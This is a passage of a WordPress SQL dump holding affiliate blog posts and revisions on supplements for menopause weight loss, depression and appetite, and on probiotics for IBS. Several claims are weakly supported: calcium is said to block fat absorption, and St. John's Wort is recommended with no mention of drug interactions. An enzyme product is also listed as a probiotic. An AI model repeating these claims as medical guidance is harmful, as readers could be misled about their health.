Menopause is a natural phase of a woman\'s life, marking the end of her reproductive years. While it brings about various changes in the body, one of the most common and frustrating challenges women face during this time is weight gain or difficulty in losing weight. Hormonal shifts, slowed metabolism, and other factors can make it challenging to shed those extra pounds. However, with the right approach, including a well-balanced diet, regular exercise, and strategic supplementation, managing weight loss during menopause is attainable.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this blog post, we\'ll focus on the role of supplements and how they can aid in your weight loss journey during menopause.

\n\n\n\n

Calcium
Menopausal women are at a higher risk of bone density loss. Calcium supplements help maintain strong bones and also have a positive impact on weight loss. Studies suggest that adequate calcium intake can prevent fat absorption in the digestive tract and promote fat breakdown. Aim for around 1,000 to 1,200 mg of calcium per day from supplements and dietary sources like dairy products, leafy greens, and fortified foods.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Vitamin D
Vitamin D works in tandem with calcium to support bone health and has been linked to weight loss. Additionally, it may help regulate insulin levels and improve mood during menopause. Most experts recommend 600 to 800 IU of vitamin D daily for menopausal women, but consult your healthcare provider for personalized guidance.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, have numerous health benefits, including weight management. They help reduce inflammation and support heart health. Omega-3s also assist in maintaining healthy hormone levels, which can be especially beneficial during menopause. Aim for 1,000 to 2,000 mg of omega-3s per day, either through supplements or by incorporating fatty fish like salmon and mackerel into your diet.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Magnesium
Magnesium plays a crucial role in maintaining muscle function and overall health. It can help regulate blood sugar levels, which can be erratic during menopause, and improve sleep quality. Sleep is closely linked to weight management, as poor sleep can lead to weight gain. Consider a daily magnesium supplement or consume magnesium-rich foods like nuts, seeds, and whole grains.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Probiotics
Probiotics are beneficial bacteria that promote a healthy gut microbiome. Emerging research suggests that a balanced gut flora may support weight loss and help control inflammation. You can find probiotics in supplement form or in fermented foods like yogurt, kefir, and kimchi. Aim for a daily intake of probiotics, either through supplements or dietary sources.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

Green Tea Extract
Green tea extract contains compounds like EGCG (epigallocatechin gallate), which have been shown to boost metabolism and enhance fat oxidation. Some studies suggest that green tea extract supplements can aid in weight loss efforts. Consult with your healthcare provider for the appropriate dosage and recommendations.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

While supplements can complement your efforts to manage weight during menopause, they should not be viewed as a quick fix. A holistic approach that combines these supplements with a balanced diet, regular exercise, stress management, and adequate sleep is essential for achieving and maintaining a healthy weight during this life stage. Before adding any supplements to your routine, it\'s crucial to consult with a healthcare professional to ensure they are suitable for your individual needs and health status. Remember that every woman\'s menopause experience is unique, so tailoring your approach is key to success.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Supplements for Managing Weight Loss During Menopause','','publish','open','open','','supplements-for-managing-weight-loss-during-menopause','','','2023-10-10 14:01:09','2023-10-10 14:01:09','',0,'https://tummyrevolution.com/?p=5516',0,'post','',0),(5517,3,'2023-09-13 07:59:32','2023-09-13 07:59:32','','vicky-ng-uy_V12d-VXU-unsplash','','inherit','open','closed','','vicky-ng-uy_v12d-vxu-unsplash','','','2023-09-13 07:59:32','2023-09-13 07:59:32','',5516,'http://tummyrevolution.com/wp-content/uploads/2023/09/vicky-ng-uy_V12d-VXU-unsplash.jpg',0,'attachment','image/jpeg',0); INSERT INTO `wpvt_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (5525,3,'2023-09-13 08:58:31','2023-09-13 08:58:31','\n

Menopause is a natural phase of a woman\'s life, marking the end of her reproductive years. While it brings about various changes in the body, one of the most common and frustrating challenges women face during this time is weight gain or difficulty in losing weight. Hormonal shifts, slowed metabolism, and other factors can make it challenging to shed those extra pounds. However, with the right approach, including a well-balanced diet, regular exercise, and strategic supplementation, managing weight loss during menopause is attainable. In this blog post, we\'ll focus on the role of supplements and how they can aid in your weight loss journey during menopause.

\n\n\n\n

Calcium
Menopausal women are at a higher risk of bone density loss. Calcium supplements help maintain strong bones and also have a positive impact on weight loss. Studies suggest that adequate calcium intake can prevent fat absorption in the digestive tract and promote fat breakdown. Aim for around 1,000 to 1,200 mg of calcium per day from supplements and dietary sources like dairy products, leafy greens, and fortified foods.

\n\n\n\n

Vitamin D
Vitamin D works in tandem with calcium to support bone health and has been linked to weight loss. Additionally, it may help regulate insulin levels and improve mood during menopause. Most experts recommend 600 to 800 IU of vitamin D daily for menopausal women, but consult your healthcare provider for personalized guidance.

\n\n\n\n

Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, have numerous health benefits, including weight management. They help reduce inflammation and support heart health. Omega-3s also assist in maintaining healthy hormone levels, which can be especially beneficial during menopause. Aim for 1,000 to 2,000 mg of omega-3s per day, either through supplements or by incorporating fatty fish like salmon and mackerel into your diet.

\n\n\n\n

Magnesium
Magnesium plays a crucial role in maintaining muscle function and overall health. It can help regulate blood sugar levels, which can be erratic during menopause, and improve sleep quality. Sleep is closely linked to weight management, as poor sleep can lead to weight gain. Consider a daily magnesium supplement or consume magnesium-rich foods like nuts, seeds, and whole grains.

\n\n\n\n

Probiotics
Probiotics are beneficial bacteria that promote a healthy gut microbiome. Emerging research suggests that a balanced gut flora may support weight loss and help control inflammation. You can find probiotics in supplement form or in fermented foods like yogurt, kefir, and kimchi. Aim for a daily intake of probiotics, either through supplements or dietary sources.

\n\n\n\n

Green Tea Extract
Green tea extract contains compounds like EGCG (epigallocatechin gallate), which have been shown to boost metabolism and enhance fat oxidation. Some studies suggest that green tea extract supplements can aid in weight loss efforts. Consult with your healthcare provider for the appropriate dosage and recommendations.

\n\n\n\n

Conclusion

\n\n\n\n

While supplements can complement your efforts to manage weight during menopause, they should not be viewed as a quick fix. A holistic approach that combines these supplements with a balanced diet, regular exercise, stress management, and adequate sleep is essential for achieving and maintaining a healthy weight during this life stage. Before adding any supplements to your routine, it\'s crucial to consult with a healthcare professional to ensure they are suitable for your individual needs and health status. Remember that every woman\'s menopause experience is unique, so tailoring your approach is key to success.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Supplements for Managing Weight Loss During Menopause','','inherit','closed','closed','','5516-revision-v1','','','2023-09-13 08:58:31','2023-09-13 08:58:31','',5516,'https://tummyrevolution.com/?p=5525',0,'revision','',0),(5518,3,'2023-09-13 08:00:50','2023-09-13 08:00:50','\n

Menopause is a natural phase of a woman\'s life, marking the end of her reproductive years. While it brings about various changes in the body, one of the most common and frustrating challenges women face during this time is weight gain or difficulty in losing weight. Hormonal shifts, slowed metabolism, and other factors can make it challenging to shed those extra pounds. However, with the right approach, including a well-balanced diet, regular exercise, and strategic supplementation, managing weight loss during menopause is attainable. In this blog post, we\'ll focus on the role of supplements and how they can aid in your weight loss journey during menopause.

\n\n\n\n

Calcium
Menopausal women are at a higher risk of bone density loss. Calcium supplements help maintain strong bones and also have a positive impact on weight loss. Studies suggest that adequate calcium intake can prevent fat absorption in the digestive tract and promote fat breakdown. Aim for around 1,000 to 1,200 mg of calcium per day from supplements and dietary sources like dairy products, leafy greens, and fortified foods.

\n\n\n\n

Vitamin D
Vitamin D works in tandem with calcium to support bone health and has been linked to weight loss. Additionally, it may help regulate insulin levels and improve mood during menopause. Most experts recommend 600 to 800 IU of vitamin D daily for menopausal women, but consult your healthcare provider for personalized guidance.

\n\n\n\n

Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, have numerous health benefits, including weight management. They help reduce inflammation and support heart health. Omega-3s also assist in maintaining healthy hormone levels, which can be especially beneficial during menopause. Aim for 1,000 to 2,000 mg of omega-3s per day, either through supplements or by incorporating fatty fish like salmon and mackerel into your diet.

\n\n\n\n

Magnesium
Magnesium plays a crucial role in maintaining muscle function and overall health. It can help regulate blood sugar levels, which can be erratic during menopause, and improve sleep quality. Sleep is closely linked to weight management, as poor sleep can lead to weight gain. Consider a daily magnesium supplement or consume magnesium-rich foods like nuts, seeds, and whole grains.

\n\n\n\n

Probiotics
Probiotics are beneficial bacteria that promote a healthy gut microbiome. Emerging research suggests that a balanced gut flora may support weight loss and help control inflammation. You can find probiotics in supplement form or in fermented foods like yogurt, kefir, and kimchi. Aim for a daily intake of probiotics, either through supplements or dietary sources.

\n\n\n\n

Green Tea Extract
Green tea extract contains compounds like EGCG (epigallocatechin gallate), which have been shown to boost metabolism and enhance fat oxidation. Some studies suggest that green tea extract supplements can aid in weight loss efforts. Consult with your healthcare provider for the appropriate dosage and recommendations.

\n\n\n\n

Maca Root
Maca root is an adaptogen known for its hormone-balancing properties. During menopause, it may help alleviate symptoms like hot flashes and mood swings. By promoting hormonal balance, maca root could indirectly support weight management. Consider a maca root supplement or add it to your diet in powdered form.

\n\n\n\n

Conclusion

\n\n\n\n

While supplements can complement your efforts to manage weight during menopause, they should not be viewed as a quick fix. A holistic approach that combines these supplements with a balanced diet, regular exercise, stress management, and adequate sleep is essential for achieving and maintaining a healthy weight during this life stage. Before adding any supplements to your routine, it\'s crucial to consult with a healthcare professional to ensure they are suitable for your individual needs and health status. Remember that every woman\'s menopause experience is unique, so tailoring your approach is key to success.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Supplements for Managing Weight Loss During Menopause','','inherit','closed','closed','','5516-revision-v1','','','2023-09-13 08:00:50','2023-09-13 08:00:50','',5516,'https://tummyrevolution.com/?p=5518',0,'revision','',0),(5519,3,'2023-09-13 08:09:05','2023-09-13 08:09:05','\n

Menopause is a natural phase in a woman\'s life that marks the end of her reproductive years. While it is a significant transition, it can also bring about a range of physical and emotional symptoms, including depression. The hormonal changes that occur during menopause can contribute to mood swings and feelings of sadness or hopelessness. While there are various treatments available, some women turn to supplements as a complementary approach to managing their mental health during this challenging time.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this blog supplement, we\'ll explore some of the supplements that may help cope with depression during menopause and discuss their potential benefits.

\n\n\n\n

St. John\'s Wort

\n\n\n\n

St. John\'s Wort is a popular herbal remedy that has been used for centuries to treat mood disorders, including depression. Some studies suggest that it may be effective in alleviating mild to moderate depression symptoms. It is believed to work by increasing the levels of certain neurotransmitters in the brain, such as serotonin, which play a role in regulating mood.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n\n\n

Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fatty fish like salmon, flaxseeds, and walnuts, are known for their potential to support mental health. Research has shown that omega-3s can help reduce symptoms of depression and improve mood by reducing inflammation in the brain and supporting healthy brain function. Incorporating more omega-3-rich foods into your diet or taking fish oil supplements may be beneficial during menopause.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Vitamin D

\n\n\n\n

Vitamin D is sometimes called the \"sunshine vitamin\" because your skin produces it when exposed to sunlight. Low vitamin D levels have been associated with an increased risk of depression. Since menopausal women are often at risk for vitamin D deficiency due to reduced sun exposure and age-related changes in metabolism, taking a vitamin D supplement may help support both bone health and mood.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

B Vitamins

\n\n\n\n

B vitamins, particularly B6, B9 (folic acid), and B12, are essential for brain health and the production of neurotransmitters. Some studies suggest that deficiencies in these vitamins can contribute to depression and mood disturbances. While it\'s always best to get your nutrients from a balanced diet, if you have concerns about your B vitamin intake, supplements may be considered.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Black Cohosh

\n\n\n\n

Black cohosh is an herbal remedy that has been used by some women to manage menopausal symptoms, including mood swings and hot flashes. While more research is needed to confirm its effectiveness, some women have reported improvements in mood and emotional stability when using black cohosh supplements.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Ashwagandha

\n\n\n\n

Ashwagandha is an adaptogenic herb known for its stress-reducing properties. It may help manage symptoms of depression and anxiety by modulating the body\'s response to stress and supporting a balanced mood. While it may not directly address menopausal symptoms, it can contribute to overall emotional well-being.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary

\n\n\n\n

Supplements can be a helpful addition to your overall approach to managing depression during menopause, but they should not replace professional medical advice or treatment. 

\n\n\n\n

Before starting any supplement regimen, it\'s essential to consult with a healthcare provider who can evaluate your specific needs and recommend the most appropriate options. Additionally, remember that a healthy lifestyle, including regular exercise, a balanced diet, and stress management techniques, can also play a significant role in managing depression during menopause. Supplements, when used wisely and in conjunction with other strategies, can be a valuable tool in supporting your mental and emotional well-being during this transformative phase of life.

\n','Coping with Depression During Menopause: The Role of Supplements','','publish','open','open','','coping-with-depression-during-menopause-the-role-of-supplements','','','2023-10-10 08:28:50','2023-10-10 08:28:50','',0,'https://tummyrevolution.com/?p=5519',0,'post','',0),(5520,3,'2023-09-13 08:07:53','2023-09-13 08:07:53','','emma-simpson-mNGaaLeWEp0-unsplash','','inherit','open','closed','','emma-simpson-mngaalewep0-unsplash','','','2023-09-13 08:07:53','2023-09-13 08:07:53','',5519,'http://tummyrevolution.com/wp-content/uploads/2023/09/emma-simpson-mNGaaLeWEp0-unsplash.jpg',0,'attachment','image/jpeg',0),(5521,3,'2023-09-13 08:09:05','2023-09-13 08:09:05','\n

Menopause is a natural phase in a woman\'s life that marks the end of her reproductive years. While it is a significant transition, it can also bring about a range of physical and emotional symptoms, including depression. The hormonal changes that occur during menopause can contribute to mood swings and feelings of sadness or hopelessness. While there are various treatments available, some women turn to supplements as a complementary approach to managing their mental health during this challenging time. In this blog supplement, we\'ll explore some of the supplements that may help cope with depression during menopause and discuss their potential benefits.

\n\n\n\n

St. John\'s Wort

\n\n\n\n

St. John\'s Wort is a popular herbal remedy that has been used for centuries to treat mood disorders, including depression. Some studies suggest that it may be effective in alleviating mild to moderate depression symptoms. It is believed to work by increasing the levels of certain neurotransmitters in the brain, such as serotonin, which play a role in regulating mood.

\n\n\n\n

Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fatty fish like salmon, flaxseeds, and walnuts, are known for their potential to support mental health. Research has shown that omega-3s can help reduce symptoms of depression and improve mood by reducing inflammation in the brain and supporting healthy brain function. Incorporating more omega-3-rich foods into your diet or taking fish oil supplements may be beneficial during menopause.

\n\n\n\n

Vitamin D

\n\n\n\n

Vitamin D is sometimes called the \"sunshine vitamin\" because your skin produces it when exposed to sunlight. Low vitamin D levels have been associated with an increased risk of depression. Since menopausal women are often at risk for vitamin D deficiency due to reduced sun exposure and age-related changes in metabolism, taking a vitamin D supplement may help support both bone health and mood.

\n\n\n\n

B Vitamins

\n\n\n\n

B vitamins, particularly B6, B9 (folic acid), and B12, are essential for brain health and the production of neurotransmitters. Some studies suggest that deficiencies in these vitamins can contribute to depression and mood disturbances. While it\'s always best to get your nutrients from a balanced diet, if you have concerns about your B vitamin intake, supplements may be considered.

\n\n\n\n

Black Cohosh

\n\n\n\n

Black cohosh is an herbal remedy that has been used by some women to manage menopausal symptoms, including mood swings and hot flashes. While more research is needed to confirm its effectiveness, some women have reported improvements in mood and emotional stability when using black cohosh supplements.

\n\n\n\n

Ashwagandha

\n\n\n\n

Ashwagandha is an adaptogenic herb known for its stress-reducing properties. It may help manage symptoms of depression and anxiety by modulating the body\'s response to stress and supporting a balanced mood. While it may not directly address menopausal symptoms, it can contribute to overall emotional well-being.

\n\n\n\n

Summary

\n\n\n\n

Supplements can be a helpful addition to your overall approach to managing depression during menopause, but they should not replace professional medical advice or treatment. 

\n\n\n\n

Before starting any supplement regimen, it\'s essential to consult with a healthcare provider who can evaluate your specific needs and recommend the most appropriate options. Additionally, remember that a healthy lifestyle, including regular exercise, a balanced diet, and stress management techniques, can also play a significant role in managing depression during menopause. Supplements, when used wisely and in conjunction with other strategies, can be a valuable tool in supporting your mental and emotional well-being during this transformative phase of life.

\n','Coping with Depression During Menopause: The Role of Supplements','','inherit','closed','closed','','5519-revision-v1','','','2023-09-13 08:09:05','2023-09-13 08:09:05','',5519,'https://tummyrevolution.com/?p=5521',0,'revision','',0),(5522,3,'2023-09-13 08:57:37','2023-09-13 08:57:37','\n

Menopause is a natural phase in a woman\'s life that brings about various hormonal changes, leading to a range of symptoms. One common issue that many women face during menopause is a loss of appetite. This can be concerning as a lack of proper nutrition can have adverse effects on overall health and well-being. While it\'s essential to consult with a healthcare provider for personalized guidance,

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

There are some supplements that may help improve appetite during menopause.

\n\n\n\n

Maca Root
Maca root is a natural supplement derived from the Peruvian maca plant. It has gained popularity for its potential to help balance hormones and alleviate menopausal symptoms, including a reduced appetite. Maca root is rich in vitamins, minerals, and amino acids that can support overall health. It may also enhance mood, which can indirectly stimulate appetite. However, it\'s essential to consult with a healthcare provider before adding maca root to your regimen, especially if you have any underlying health conditions.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Ashwagandha
Ashwagandha is an adaptogenic herb that has been used in traditional Ayurvedic medicine for centuries. It may help reduce stress and anxiety, which are common during menopause and can contribute to a loss of appetite. By promoting relaxation and balancing cortisol levels, ashwagandha may indirectly stimulate appetite. As with any supplement, it\'s crucial to discuss its use with a healthcare professional, especially if you\'re taking medications or have any medical conditions.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, have numerous health benefits, including potential appetite enhancement. They can help reduce inflammation, improve mood, and support brain health, all of which can contribute to a healthier appetite. Omega-3 supplements are generally safe, but it\'s advisable to choose high-quality, purified fish oil to avoid contaminants.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Zinc
Zinc is an essential mineral that plays a crucial role in various bodily functions, including appetite regulation. A deficiency in zinc can lead to a reduced sense of taste and smell, which can diminish appetite. Menopausal women may be at risk of zinc deficiency, making supplementation a potential option. However, it\'s essential not to exceed recommended doses, as excessive zinc intake can have adverse effects on health.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Vitamin B Complex
B vitamins, including B6 and B12, are essential for maintaining a healthy appetite and energy levels. During menopause, hormonal changes can impact the absorption of these vitamins. A vitamin B complex supplement can help ensure you\'re getting an adequate supply of these nutrients. It\'s best to consult with a healthcare provider to determine the right dosage and formulation for your specific needs.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Ginseng
Ginseng is an herbal supplement known for its adaptogenic properties. It may help reduce fatigue, improve mood, and enhance overall well-being, which can positively influence appetite. Ginseng supplements are available in various forms, including capsules, teas, and powders. Consult with a healthcare provider to determine the most suitable type and dosage for you.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

A loss of appetite during menopause can be distressing, but there are supplements that may help improve your appetite and overall well-being. However, it\'s crucial to remember that supplements should complement a balanced diet and healthy lifestyle, not replace them. Always consult with a healthcare provider before adding any new supplements to your routine, as individual needs and potential interactions with medications can vary. Additionally, prioritize a well-rounded diet, regular exercise, and stress management techniques to support your overall health during this transitional phase in your life.

\n','Best Supplements to Boost Appetite During Menopause','','publish','open','open','','best-supplements-to-boost-appetite-during-menopause','','','2023-10-10 13:30:28','2023-10-10 13:30:28','',0,'https://tummyrevolution.com/?p=5522',0,'post','',0),(5523,3,'2023-09-13 08:56:25','2023-09-13 08:56:25','','lee-myungseong-y1XXWct5rBo-unsplash','','inherit','open','closed','','lee-myungseong-y1xxwct5rbo-unsplash','','','2023-09-13 08:56:25','2023-09-13 08:56:25','',5522,'http://tummyrevolution.com/wp-content/uploads/2023/09/lee-myungseong-y1XXWct5rBo-unsplash.jpg',0,'attachment','image/jpeg',0),(5524,3,'2023-09-13 08:57:37','2023-09-13 08:57:37','\n

Menopause is a natural phase in a woman\'s life that brings about various hormonal changes, leading to a range of symptoms. One common issue that many women face during menopause is a loss of appetite. This can be concerning as a lack of proper nutrition can have adverse effects on overall health and well-being. While it\'s essential to consult with a healthcare provider for personalized guidance, there are some supplements that may help improve appetite during menopause.

\n\n\n\n

Maca Root
Maca root is a natural supplement derived from the Peruvian maca plant. It has gained popularity for its potential to help balance hormones and alleviate menopausal symptoms, including a reduced appetite. Maca root is rich in vitamins, minerals, and amino acids that can support overall health. It may also enhance mood, which can indirectly stimulate appetite. However, it\'s essential to consult with a healthcare provider before adding maca root to your regimen, especially if you have any underlying health conditions.

\n\n\n\n

Ashwagandha
Ashwagandha is an adaptogenic herb that has been used in traditional Ayurvedic medicine for centuries. It may help reduce stress and anxiety, which are common during menopause and can contribute to a loss of appetite. By promoting relaxation and balancing cortisol levels, ashwagandha may indirectly stimulate appetite. As with any supplement, it\'s crucial to discuss its use with a healthcare professional, especially if you\'re taking medications or have any medical conditions.

\n\n\n\n

Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, have numerous health benefits, including potential appetite enhancement. They can help reduce inflammation, improve mood, and support brain health, all of which can contribute to a healthier appetite. Omega-3 supplements are generally safe, but it\'s advisable to choose high-quality, purified fish oil to avoid contaminants.

\n\n\n\n

Zinc
Zinc is an essential mineral that plays a crucial role in various bodily functions, including appetite regulation. A deficiency in zinc can lead to a reduced sense of taste and smell, which can diminish appetite. Menopausal women may be at risk of zinc deficiency, making supplementation a potential option. However, it\'s essential not to exceed recommended doses, as excessive zinc intake can have adverse effects on health.

\n\n\n\n

Vitamin B Complex
B vitamins, including B6 and B12, are essential for maintaining a healthy appetite and energy levels. During menopause, hormonal changes can impact the absorption of these vitamins. A vitamin B complex supplement can help ensure you\'re getting an adequate supply of these nutrients. It\'s best to consult with a healthcare provider to determine the right dosage and formulation for your specific needs.

\n\n\n\n

Ginseng
Ginseng is an herbal supplement known for its adaptogenic properties. It may help reduce fatigue, improve mood, and enhance overall well-being, which can positively influence appetite. Ginseng supplements are available in various forms, including capsules, teas, and powders. Consult with a healthcare provider to determine the most suitable type and dosage for you.

\n\n\n\n

Conclusion

\n\n\n\n

A loss of appetite during menopause can be distressing, but there are supplements that may help improve your appetite and overall well-being. However, it\'s crucial to remember that supplements should complement a balanced diet and healthy lifestyle, not replace them. Always consult with a healthcare provider before adding any new supplements to your routine, as individual needs and potential interactions with medications can vary. Additionally, prioritize a well-rounded diet, regular exercise, and stress management techniques to support your overall health during this transitional phase in your life.

\n','Best Supplements to Boost Appetite During Menopause','','inherit','closed','closed','','5522-revision-v1','','','2023-09-13 08:57:37','2023-09-13 08:57:37','',5522,'https://tummyrevolution.com/?p=5524',0,'revision','',0),(5526,1,'2023-10-12 07:44:19','2023-10-12 07:44:19','\n

With so many IBS probiotic supplements available to choose from, it’s hard to know which would suit you best and which one to choose.

When selecting a probiotic for IBS, you need to initially consider factors such as: 

\n\n\n\n
    \n
  • type and severity of your symptoms
  • \n\n\n\n
  • what would be the right dosage for you
  • \n\n\n\n
  • Some people respond better to different strains
  • \n
\n\n\n\n

It may take some time to find the right probiotic and dosage that works best for you. Sometimes this means trying a few different types or brands to find the right one. If you have a sensitive gut start by trying a probiotic with a slightly lower number CFUs such as 1-15 billion CFUs. Choosing a Probiotic with a high number CFUs, such as 50-100+ billion, might have the opposite desired effect on your gut so be cautious. By starting with a lower dosage probiotic you can monitor how you respond and then increase the dosage if you feel this is right for you.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

1. Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

2. Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

3. Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n\n\n\n


Conclusion

\n\n\n\n

Living with IBS doesn\'t have to mean enduring constant discomfort. Incorporating the right probiotics into your daily routine could provide the relief you seek by fostering a healthier gut environment. However, it\'s important to note that individual responses to probiotics may vary. Consulting with a healthcare professional before starting any new supplement regimen is recommended, especially if you have underlying health conditions or are taking medications. With the guidance of a healthcare provider, you can select the probiotic strains that align with your needs and take a step toward managing your IBS symptoms effectively.

\n','What type of probiotics works best for IBS ','','publish','open','open','','what-type-of-probiotics-works-best-for-ibs','','','2023-10-12 07:44:21','2023-10-12 07:44:21','',0,'https://tummyrevolution.com/?p=5526',0,'post','',0),(5527,1,'2023-09-13 13:40:48','2023-09-13 13:40:48','','samuel-regan-asante-jsley_wlVOA-unsplash','','inherit','open','closed','','samuel-regan-asante-jsley_wlvoa-unsplash','','','2023-09-13 13:40:48','2023-09-13 13:40:48','',5526,'http://tummyrevolution.com/wp-content/uploads/2023/09/samuel-regan-asante-jsley_wlVOA-unsplash.jpg',0,'attachment','image/jpeg',0),(5528,1,'2023-09-13 13:44:10','2023-09-13 13:44:10','','tummy pic','','inherit','open','closed','','tummy-pic','','','2023-09-13 13:44:10','2023-09-13 13:44:10','',5526,'http://tummyrevolution.com/wp-content/uploads/2023/09/tummy-pic.jpg',0,'attachment','image/jpeg',0),(5529,1,'2023-09-13 13:47:18','2023-09-13 13:47:18','Probiotics\nIBS\nTop Probiotics','Probiotics for IBS','How to choose the right Probiotics for IBS','inherit','open','closed','','pexels-alicia-harper-7510940','','','2023-10-12 07:42:19','2023-10-12 07:42:19','',5526,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-alicia-harper-7510940.jpg',0,'attachment','image/jpeg',0),(5530,1,'2023-09-13 13:47:55','2023-09-13 13:47:55','How to choose the right probiotics for IBS','Top Probiotics for IBS','How to vhoose the best Probiotics for IBS','inherit','open','closed','','pexels-karley-saagi-2064692','','','2023-10-12 07:45:59','2023-10-12 07:45:59','',5526,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-karley-saagi-2064692.jpg',0,'attachment','image/jpeg',0),(5531,1,'2023-09-13 13:48:05','2023-09-13 13:48:05','','pexels-polina-tankilevitch-4110334','','inherit','open','closed','','pexels-polina-tankilevitch-4110334','','','2023-09-13 13:48:05','2023-09-13 13:48:05','',5526,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-polina-tankilevitch-4110334.jpg',0,'attachment','image/jpeg',0),(5532,1,'2023-09-13 13:48:11','2023-09-13 13:48:11','How to loose weight fast with bone brith','bone broth','How to loose weight with bone broth','inherit','open','closed','','pexels-jenvit-keiwalinsarid-3559899','','','2023-10-11 16:07:19','2023-10-11 16:07:19','',5526,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-jenvit-keiwalinsarid-3559899.jpg',0,'attachment','image/jpeg',0),(5533,1,'2023-09-13 13:50:31','2023-09-13 13:50:31','\n

With so many IBS probiotic supplements available to choose from, it’s hard to know which would suit you best and which one to choose.

When selecting a probiotic for IBS, you need to initially consider factors such as: 

\n\n\n\n
    \n
  • type and severity of your symptoms
  • \n\n\n\n
  • what would be the right dosage for you
  • \n\n\n\n
  • Some people respond better to different strains
  • \n
\n\n\n\n

It may take some time to find the right probiotic and dosage that works best for you. Sometimes this means trying a few different types or brands to find the right one. If you have a sensitive gut start by trying a probiotic with a slightly lower number CFUs such as 1-15 billion CFUs. Choosing a Probiotic with a high number CFUs, such as 50-100+ billion, might have the opposite desired effect on your gut so be cautious. By starting with a lower dosage probiotic you can monitor how you respond and then increase the dosage if you feel this is right for you.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea

\n\n\n\n

Optibac

\n\n\n\n

\n\n\n\n

Culturelle

\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation

\n\n\n\n

\n\n\n\n

Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

